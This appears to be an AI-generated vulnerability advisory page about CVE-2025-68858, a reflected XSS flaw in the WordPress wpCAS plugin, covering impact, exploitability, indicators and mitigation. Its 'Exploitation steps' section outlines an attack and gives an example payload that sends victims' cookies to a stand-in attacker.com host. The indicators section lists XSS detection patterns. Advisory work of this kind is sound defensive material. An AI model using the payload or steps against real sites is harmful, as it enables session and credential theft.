CVE-2025-68858
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-68858 is a Reflected Cross-Site Scripting (XSS) vulnerability in the WordPress wpCAS plugin developed by Casey Bisson. It affects all versions of wpCAS up to and including version 1.07, and was reported by researcher 0xVenus on October 31, 2025, with public disclosure on January 20–22, 2026. As of the time of reporting, no official patch has been released by the plugin developer. The vulnerability carries a CVSS v3.1 base score of 7.1 (High), as assessed by CISA-ADP (Patchstack, NVD).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a Reflected XSS variant. The root cause is insufficient sanitization or encoding of user-supplied input that is reflected back in the web page response, allowing an attacker to inject arbitrary JavaScript. Exploitation requires no authentication (unauthenticated attacker) but does require user interaction — a victim must be tricked into clicking a crafted malicious link that triggers the reflected payload in their browser. The vulnerability is network-accessible with low attack complexity (Patchstack, NVD).

Impact

Successful exploitation allows an attacker to inject and execute malicious scripts in the context of a victim's browser session on the affected WordPress site. This can lead to session token theft, credential harvesting, redirection to malicious sites, defacement of page content, or delivery of further malware payloads to site visitors. The CVSS scope is marked as "Changed," indicating the impact can extend beyond the vulnerable component itself, affecting the confidentiality, integrity, and availability of the victim's browser environment (Patchstack).

Exploitability

No evidence of active in-the-wild exploitation has been reported at this time, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term. However, Patchstack notes that vulnerabilities of this type are commonly used in mass-exploit campaigns targeting WordPress plugins at scale, regardless of site popularity. No public PoC exploit code has been identified, and no specific threat actor attribution has been made (Patchstack, NVD).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the wpCAS plugin (version ≤ 1.07) using tools like WPScan, Shodan, or Google dorks targeting plugin-specific paths (e.g., /wp-content/plugins/wpcas/).
  2. Identify vulnerable parameter: Analyze the wpCAS plugin's request handling to locate input parameters that are reflected unsanitized in the HTTP response — typically URL query parameters processed during CAS authentication redirects.
  3. Craft malicious URL: Construct a URL containing a reflected XSS payload in the vulnerable parameter, e.g., https://target-site.com/wp-login.php?cas_param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  4. Deliver payload: Send the crafted URL to a target victim (e.g., a WordPress administrator) via phishing email, social engineering, or embedding in a malicious page.
  5. Achieve objective: When the victim clicks the link and their browser loads the page, the injected script executes in their browser context, enabling session cookie theft, credential capture, or further malicious actions (Patchstack).

Indicators of compromise

  • Network: Unusual inbound HTTP requests to WordPress login or CAS-related endpoints containing URL-encoded script tags or JavaScript event handlers (e.g., <script>, onerror=, javascript:) in query parameters; outbound requests from victim browsers to unknown external domains shortly after visiting the site.
  • Logs: WordPress or web server access logs showing GET/POST requests to wpCAS-related endpoints with suspicious encoded payloads in query strings (e.g., %3Cscript%3E, %22onmouseover%22).
  • File System: Unexpected modifications to wpCAS plugin files or injection of malicious code into plugin PHP files if an attacker escalated access after XSS exploitation.

Mitigation and workarounds

As of the disclosure date, no official patch has been released by the plugin developer Casey Bisson for wpCAS. Patchstack has issued a virtual patching/mitigation rule for Patchstack-protected sites to block exploitation attempts until an official fix is available. Site administrators are advised to deactivate and remove the wpCAS plugin until a patched version is released, or to use Patchstack's managed mitigation service as an interim measure. Additionally, implementing a Web Application Firewall (WAF) with XSS filtering rules can help reduce exposure (Patchstack).

Community reactions

The vulnerability was discovered and reported by security researcher 0xVenus and disclosed through Patchstack's coordinated vulnerability disclosure process. Patchstack classified it as medium priority and noted the potential for mass-exploit campaigns targeting WordPress plugins. No significant broader media coverage or notable social media commentary has been identified beyond the Patchstack advisory (Patchstack).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-77115HIGH7.1
  • brave-popup-builder
NoYesAug 23, 2026
CVE-2026-77116MEDIUM4.3
  • brave-popup-builder
NoYesAug 23, 2026
CVE-2026-14853MEDIUM4.3
  • woocommerce-bookings
NoYesAug 23, 2026
CVE-2026-77003LOW2.7
  • content-mask
NoYesAug 23, 2026
CVE-2026-13598NONEN/A
  • restrictmate
NoYesAug 23, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management